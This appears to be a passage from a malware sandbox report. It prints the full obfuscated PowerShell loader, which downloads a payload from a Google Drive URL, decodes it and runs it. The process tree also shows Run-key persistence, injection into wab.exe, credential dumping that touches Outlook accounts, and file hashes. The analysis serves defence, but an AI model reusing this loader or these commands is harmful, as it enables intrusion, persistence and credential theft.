MakrdJytteeBarrarMoralsSthen[Misf $KvabsUblgegnAfvejaSjaskvKalkua GkkeiAstril Mi,daf jltbKaliblBedd,yClotinForsvdSali.gEpi ai UorgvTro,pe UnwanSekredNon ceLa.na]Creir=Deva.$L ninPtyvstrSiam.eKonvecL.tasi KattpPrecoiAssimtDirigaTwinknTosprtMyrtanPrinte In,es CafesRever ');$Semihumbug=Incrassation 'Tunne$U scrOOlofav Pa,heKal.ur Karyh Da aeCrania Helld ntisi MultnSt,ise RespsFo,evsUopsi. S.lgD.oilsoI.praw ,lyanUnreslHusmooCas,oaSwea.d Ro uF OpgjiKast,lOctane F rp(Klema$ inglCSupera Datap EmorrDelfiiS.mmecBru ecSkraaiRabbioHjtudsFakt.oViki 2Ono.a3Tec.i3Hippu,Studi$In.brMC aniiBefr.xLnsyseLeiod)papir ';$Mixe=$Sukkerlage[0];snedriver (Incrassation 'Beewi$,oksegTas olDmkuro.ysteb Mispa Autelskriv:Tid.gNPa tioUnexpn Sspec Mum.hBulleaPackbl Musil nfuseEnchynJalougEp.kui Un.onWurligMario6 Fyri6En.os=L mpe(O,skiT alse,aryosExcavtres,r-LiturPRad oa e,opt.ldsshSneer Mast$FlunkM .avli OratxAfslaeKn al)Vinys ');while (!$Nonchallenging66) {snedriver (Incrassation 'Soute$Tryksg Tapel PrefoUnd,rbKautiaDemonlgarde: Di,tO SafirUfordg Intra SumpnG mmiepigg.tfustytfolkee Nest= ,eso$Uns ttTroldrStrm uHanoleCachi ') ;snedriver $Semihumbug;snedriver (Incrassation 'TommeSOverstEndotaCellur ErittUnmi,-StrudSDesinlbantue InteeGarnipCre a Tal,f4Reple ');snedriver (Incrassation ' Biof$H,drog MagnlSikkeoForhobDetaia,scarlOatla:NonprN.addooSistnnHyperc FinnhN.tmaaKlodslUnapplSpakeeTvrr nluftigampuliVand.nFict,g Ekst6Eldmo6Minel=T rea(NongeTPrecaeEsta,sEftert S.dd-grandP arlabah ctPh,tohSorbo Poin$DiarrM attriD,barxHydroeSupra)Annoy ') ;snedriver (Incrassation ' D,sa$Proang erfel VerboHyp.rb ramia Ld,alS erg:.naphIAnatonKra.tsHyperu SydalFrakka,edhot kspee,okard .eng=Falsu$ProvogBefollOrienoHjemtb ReriahalvrlNae,t:ObeliP SennuDisdetLng,eo,ortuuUnweitPol,rs Neur+ Strm+Map a%Mirac$ iltrFAmtski Gen.sOsculkKonseeElastrAssemiIndvis T,leaDietimCo,nelAlleri RingnStropgT lfa.H.nchcEx,teo NonvuFremfnNonfltCas i ') ;$Capriccioso233=$Fiskerisamling[$Insulated];}$Unmatching=321105;$Unavailablynequal=30275;snedriver (Incrassation 'Kuns $PlaisgP,isalMineroMon.mbBe teaBilfolSa,ir:BlseiBAnilirP,obli ShepgErotig Bdede.ilmurin.egnDeliketermis.usma Lieni=Gastr S inGTen neH,teltMarks-deltiCPrejuoReplenRetletAarsoelystsnMunketBlari ,alif$ TraiMOxybriVul ax HypeeKryp, ');snedriver (Incrassation ' Inds$ UtilgPos clTrimeoStenib nfroa DisplOpera:Vatt THewabrKommarSidese.yolfpHagerl RigoaFiloldG,gossB,gvieArgumrG.ydesOphol Taleh=Lgelf Lokal[StoleSTid,ky.dviksKphjttSk.vee jeldmBeami.HypodC disco Hu.onU kravPyopheSemicrorgant Ov.r]Junk.: H.ah:PressFUnr.grChorioBogmimPlattBScobbaStykvs InjueFad b6 Vest4A.ndsS NonrtAp,cerVinkeiInducnGgestgMutat(udvik$AllusBKob.er AcepiUnh.lgPinligSaftseEgiptrHavden snoreUn ers Past)Rocke ');snedriver (Incrassation 'Types$Miamig onpal JuraoBi.ekb.rtegaAborilTil i:P.ddlOUnsupp,ullelLo scaDdmangRoeoprTrifoeTredi Unfas=B.rse Geo o[UltraS ,gelyUnadesOutfatDu feeBerrtmBrand. elvhTbeniteEchinx alaet Dopi.CephaEPar.gnSearsc,lothoAkkomd Re,aiL,fornReusag Alpi]Lugni: Tu.k: Lb tACerioSOtalgCC,nfeIEkserIrulle.OxyneG SkibeGleamt.ynfrS BysstFestsr onariThem nDescogyapok(.uper$Pe sdT MemorWusserOpti.eSkrmbp SocilJunctaC,rtodRedaksDagtjeForldrNonsosGolde)Cathe ');snedriver (Incrassation '.ache$ Smaag.rotel ,rbeoMinigb O.thaSilvilFlydn:Unp aEKlipfx,eindt SynieUfor,rEvol.nLik fs Belih engeiBackppSkole1 Af e3 Moor1R,set=Diazo$KkkenOForlapportmlBroena G ougLillerV kseeRetab.Micros.dskiuSkidebBede.s Una.t Slagr ArkiiElemen BlokgNo.in(Cu li$TheorU RundnFortrm SpriaDrikktNorescsvarfhFugtiiLairmnHybrigMaili,Ox.de$ par UUnadonInhumaVersavNyttiaF.resi Flygl HuwpaPastob P.omlKa enyBestynR.afreVa grqBylanuStr paHobenl ka.u)Stjfo ');snedriver $Externship131;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dalmatinernes.Sel && echo t"3⤵PID:3716
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Fluoboride++;$Frothier+='subst';$Frothier+='r';}$Frothier+='ing';Function Incrassation($Tombing){$Comebacker=$Tombing.Length-$Fluoboride;For( $Unavailably=5;$Unavailably -lt $Comebacker;$Unavailably+=6){$Vertebrally+=$Tombing.$Frothier.'Invoke'( $Unavailably, $Fluoboride);}$Vertebrally;}function snedriver($Kurveoplsning){ & ($Fatsia) ($Kurveoplsning);}$Precipitantness=Incrassation ' NonrMSlurkoN nsezMaaleiSkandlAbsollD,horaBygge/Numme5Gage..,oged0Limni Ergo(Tsar.W maaiMinkan Non.dHideroVoyagwBismusUsher TilbaNSpg.lTTorni omp1Trans0Knuse.We.he0Poxal;An,st SpeedWT naciTilfinSlank6Bart.4T.ela;A.tid SubcexS nds6.eate4Trape; Tocc Over rChondvAmido:Proli1,uamf2 ,dda1Der i.Ea tl0Togst)Tilbu TartuG,erleeSkip,cForhjkHandeoEyesh/Semin2Creos0Skitt1Benzi0Inter0Agurk1 kaot0Bronc1Tegne LopseFPrecoiT.xinr Tey eLissif ClavoButl.xDrjde/Disin1Rust 2Pl.sm1Indhe.Kunds0 So i ';$Unavailablyndgivende=Incrassation ',striUKortksAn,lceOtiorrSvi.g- .nsvA.rerrgRefere P,renYperntSfyrb ';$Capriccioso233=Incrassation 'Afdanh PrimtAlairtMidmopSup rsPakis:,nqui/Pric./T ansdagnatrFo.ldi.olyfvFredheFilms.AutoogNo.bio P,ero Pre gGendalDuodeePersi.RevelcTrivsoYak,mm,emue/B uebuPacebcmanch?NrigsebarkexToftep UdjvoNoninrS,ffet .ent= Svand ApanoBesk,wLgnhantrs,nl DialoPyroaaTerridcombc&CentriTr midRe.rn=For a1Tvelye No,ibDiffe6.ridt-.rbli2PrimeDKretexPropei R.siA,ndviPArsen3 FibeZFasan9BisttMSa,amPSyns,P Skjoj R,ssMFadlsEOutdo7FastsiCocklO Glau4 DimeHPhysi4Une,tV BogmI.kannZProtilEfte UKursnf StosZb.lab ';$Transportfly=Incrassation 'overf>Reson ';$Fatsia=Incrassation 'Brnefi bet,e BiotxFresk ';$Ceiler='Licensaftale';$Virgulate = Incrassation ' tileTragtcNymphhRela,oMegap mulig%Albu,aAffinp innpDefskd Knita SalotTunkeaCompl%Aphot\AskorDM.lhiaCgi.gl helimWeldiaKlatrtFlammi.navnn T.lleCytodr .pernQuadreFremlsTomm .AssemS ForneAkkumlPolit lssen&Goodl&Divor dranke austcBrndehBurnsoAntit walbotHydro ';snedriver (Incrassation 'Kortg$ ConcgVrtsllSquibotnd nb SupeaPrev.lKonfe:Clo,eSEde.tuByttekDrankk InseeUlyk r UnqulPristaSledeg NeutePerpe= Berg( S.rec Alumm Pr,od cht Afsn/ Lipocfebri skibi$catalVSabini Troor Pan.gBrne,uMisealKollaa SwiltstalleSpeed) Ford ');snedriver (Incrassation 'Blegn$Chromg MilllNona oForvrbniddiaFl ppl Himm: BallFUnv tiKvadrs DulskAnetheGastrr.langiSendrsOp reaSemitmSymmelMystii SagsnBrun gUkamp=appel$Co,liCPad yaB.lanpOleocr Brooiwa soc pewycImboliPan.ioLifegsFritioEpig.2Dekag3,rfle3Forsk.GenfosHauntpD udglLangsiUrhantFordy(Slove$XenopTFasterDublea Sf,rnhandesPre.np Gym,oImiterP,rtutStyrefNonaflfiskeyIndda)Ama,r ');snedriver (Incrassation 'We,sm[AlyssNPed sepelomtErico.ObdorSOmstteFlan rAs.lrvBekeniMicrocGenneeSalvoP veroSmrokiBolo.n resttSinupMNavigaUneasnGangea ritig chopeNymferKita ] lit:Sprog:StoejSNonaneProjecStveku Ma rrC.aimiSwisstOmgreySne.rPCommarUdgruoTurm.tForhaoDw.rfc usinoIndsklPanes Baads=gyrop Bacil[IconoNKu.ineClacktYeast.ha.vtSEmusieDisu c FirkuAlminrHaandiVal ltAftegyBestsPV.elsrDwarfoHomoctPneumo PhotcDwaynoP,ojelBe,alTLampay,nudgp Photeflles],elic:Leann:Pr.klTHarcel KanjsRampi1Aarsk2Vinfl ');$Capriccioso233=$Fiskerisamling[0];$Rensdyrmossernes= (Incrassation 'Scutt$ Muddg,evgel,eltioS dsebfod,uaTheonlBukle: kreOUnd.fvKautieSkelerSemichS.urreDmperaDkketd Bouii CastnUsunde HedesHeli s Reko=HovedN Omste BoskwSynke- Trs.O D.spb UndejRaasteOldefc proutForf, forsnS JouryFluidsTilstt U tre,hevemBlods.lun rNR inteHypaltNatur.AverrWStanse SkanbJu,tiCAandel FumaiOpf.eeOliernStemmt');$Rensdyrmossernes+=$Sukkerlage[1];snedriver ($Rensdyrmossernes);snedriver (Incrassation 'Frban$Bil eO virkvTry beOpfanr til.hDecimeUdeeraDensadFibbei,odernMa.theDecumsKomm shexad.P rtiHsociaeBrutta MakrdJytteeBarrarMoralsSthen[Misf $KvabsUblgegnAfvejaSjaskvKalkua GkkeiAstril Mi,daf jltbKaliblBedd,yClotinForsvdSali.gEpi ai UorgvTro,pe UnwanSekredNon ceLa.na]Creir=Deva.$L ninPtyvstrSiam.eKonvecL.tasi KattpPrecoiAssimtDirigaTwinknTosprtMyrtanPrinte In,es CafesRever ');$Semihumbug=Incrassation 'Tunne$U scrOOlofav Pa,heKal.ur Karyh Da aeCrania Helld ntisi MultnSt,ise RespsFo,evsUopsi. S.lgD.oilsoI.praw ,lyanUnreslHusmooCas,oaSwea.d Ro uF OpgjiKast,lOctane F rp(Klema$ inglCSupera Datap EmorrDelfiiS.mmecBru ecSkraaiRabbioHjtudsFakt.oViki 2Ono.a3Tec.i3Hippu,Studi$In.brMC aniiBefr.xLnsyseLeiod)papir ';$Mixe=$Sukkerlage[0];snedriver (Incrassation 'Beewi$,oksegTas olDmkuro.ysteb Mispa Autelskriv:Tid.gNPa tioUnexpn Sspec Mum.hBulleaPackbl Musil nfuseEnchynJalougEp.kui Un.onWurligMario6 Fyri6En.os=L mpe(O,skiT alse,aryosExcavtres,r-LiturPRad oa e,opt.ldsshSneer Mast$FlunkM .avli OratxAfslaeKn al)Vinys ');while (!$Nonchallenging66) {snedriver (Incrassation 'Soute$Tryksg Tapel PrefoUnd,rbKautiaDemonlgarde: Di,tO SafirUfordg Intra SumpnG mmiepigg.tfustytfolkee Nest= ,eso$Uns ttTroldrStrm uHanoleCachi ') ;snedriver $Semihumbug;snedriver (Incrassation 'TommeSOverstEndotaCellur ErittUnmi,-StrudSDesinlbantue InteeGarnipCre a Tal,f4Reple ');snedriver (Incrassation ' Biof$H,drog MagnlSikkeoForhobDetaia,scarlOatla:NonprN.addooSistnnHyperc FinnhN.tmaaKlodslUnapplSpakeeTvrr nluftigampuliVand.nFict,g Ekst6Eldmo6Minel=T rea(NongeTPrecaeEsta,sEftert S.dd-grandP arlabah ctPh,tohSorbo Poin$DiarrM attriD,barxHydroeSupra)Annoy ') ;snedriver (Incrassation ' D,sa$Proang erfel VerboHyp.rb ramia Ld,alS erg:.naphIAnatonKra.tsHyperu SydalFrakka,edhot kspee,okard .eng=Falsu$ProvogBefollOrienoHjemtb ReriahalvrlNae,t:ObeliP SennuDisdetLng,eo,ortuuUnweitPol,rs Neur+ Strm+Map a%Mirac$ iltrFAmtski Gen.sOsculkKonseeElastrAssemiIndvis T,leaDietimCo,nelAlleri RingnStropgT lfa.H.nchcEx,teo NonvuFremfnNonfltCas i ') ;$Capriccioso233=$Fiskerisamling[$Insulated];}$Unmatching=321105;$Unavailablynequal=30275;snedriver (Incrassation 'Kuns $PlaisgP,isalMineroMon.mbBe teaBilfolSa,ir:BlseiBAnilirP,obli ShepgErotig Bdede.ilmurin.egnDeliketermis.usma Lieni=Gastr S inGTen neH,teltMarks-deltiCPrejuoReplenRetletAarsoelystsnMunketBlari ,alif$ TraiMOxybriVul ax HypeeKryp, ');snedriver (Incrassation ' Inds$ UtilgPos clTrimeoStenib nfroa DisplOpera:Vatt THewabrKommarSidese.yolfpHagerl RigoaFiloldG,gossB,gvieArgumrG.ydesOphol Taleh=Lgelf Lokal[StoleSTid,ky.dviksKphjttSk.vee jeldmBeami.HypodC disco Hu.onU kravPyopheSemicrorgant Ov.r]Junk.: H.ah:PressFUnr.grChorioBogmimPlattBScobbaStykvs InjueFad b6 Vest4A.ndsS NonrtAp,cerVinkeiInducnGgestgMutat(udvik$AllusBKob.er AcepiUnh.lgPinligSaftseEgiptrHavden snoreUn ers Past)Rocke ');snedriver (Incrassation 'Types$Miamig onpal JuraoBi.ekb.rtegaAborilTil i:P.ddlOUnsupp,ullelLo scaDdmangRoeoprTrifoeTredi Unfas=B.rse Geo o[UltraS ,gelyUnadesOutfatDu feeBerrtmBrand. elvhTbeniteEchinx alaet Dopi.CephaEPar.gnSearsc,lothoAkkomd Re,aiL,fornReusag Alpi]Lugni: Tu.k: Lb tACerioSOtalgCC,nfeIEkserIrulle.OxyneG SkibeGleamt.ynfrS BysstFestsr onariThem nDescogyapok(.uper$Pe sdT MemorWusserOpti.eSkrmbp SocilJunctaC,rtodRedaksDagtjeForldrNonsosGolde)Cathe ');snedriver (Incrassation '.ache$ Smaag.rotel ,rbeoMinigb O.thaSilvilFlydn:Unp aEKlipfx,eindt SynieUfor,rEvol.nLik fs Belih engeiBackppSkole1 Af e3 Moor1R,set=Diazo$KkkenOForlapportmlBroena G ougLillerV kseeRetab.Micros.dskiuSkidebBede.s Una.t Slagr ArkiiElemen BlokgNo.in(Cu li$TheorU RundnFortrm SpriaDrikktNorescsvarfhFugtiiLairmnHybrigMaili,Ox.de$ par UUnadonInhumaVersavNyttiaF.resi Flygl HuwpaPastob P.omlKa enyBestynR.afreVa grqBylanuStr paHobenl ka.u)Stjfo ');snedriver $Externship131;"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dalmatinernes.Sel && echo t"4⤵
- System Location Discovery: System Language Discovery
PID:2980
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tebbet" /t REG_EXPAND_SZ /d "%Nymarxister% -w 1 $Nonoxidation=(Get-ItemProperty -Path 'HKCU:\Macerative\').Semiquantitatively;%Nymarxister% ($Nonoxidation)"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tebbet" /t REG_EXPAND_SZ /d "%Nymarxister% -w 1 $Nonoxidation=(Get-ItemProperty -Path 'HKCU:\Macerative\').Semiquantitatively;%Nymarxister% ($Nonoxidation)"6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5100
-
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4736
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4764
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4016
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3716
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:656
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2512
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4080
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2484
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\owmhrixlbtbavjnsnzpandavbzntr"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1520
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yzrrsahnobuffpcwebkcypvmkgfckfpo"5⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2080
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jtfkt"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1200
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3332
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2168
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2916
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:760
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3080
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5048
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1940
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:116
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4688
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2076
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4700
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5040
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1152
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4880
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3652
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:432
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2052
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3888
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1912
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3576
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:716
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4592
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5100
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2128
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3288
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4800
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3088
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1596
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:212
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1888
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4704
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4328
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:924
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3020
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2792
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1176
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1472
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:512
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4916
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:940
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2528
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4236
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3340
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5000
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4892
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1328
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe5⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1816
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1968
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
140B
MD5540eee10b056d749645915e5d02896a8
SHA17ae03ac045371251693a7e53cabddcdaa96a06ff
SHA2568fc922519bb125e75091af091f5d60a274e5833da2764a26fc7ea7e85da54ad7
SHA512578c83afcea79794f506052db868df1797405c94cf8e6e53010111fd361724da9ef57225671b64616230ca3759aa4a947b48a3c031aebe145fb891bfd893c6c5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5c7ac5a21cac5bd5580a6e28112212613
SHA10a256177c387053fec680e599bcb63729a16c161
SHA25689e0e7dc8ad418f8613610b71d0c140247e26a5f9a453ee255b1467fb80f15ff
SHA512753675a75b643132e50175d67589a3952cb5154a7e51c11883b2e28bf4fe406afbaed88e61575cc114156e41ed5c587b0f76845e6d20ddf922e775bfff3f0b43
-
Filesize
457KB
MD5eaf0eec1825fc4c7702c0de998f46563
SHA11e52f255ff7538d76b9c23b4ca0019d2d6113f5e
SHA2566fd56dfc09cbc965fa8ce3770653a75e9458cf9d4798c9d8675b89406187a981
SHA512f36e354cdda4f6edbd02e634b9a6852e63c9f04c9396dc2a52b2f7f13791433db27f3670e9858e4b55402aaf902884df714008248ed2cfad6ecf47cf49520849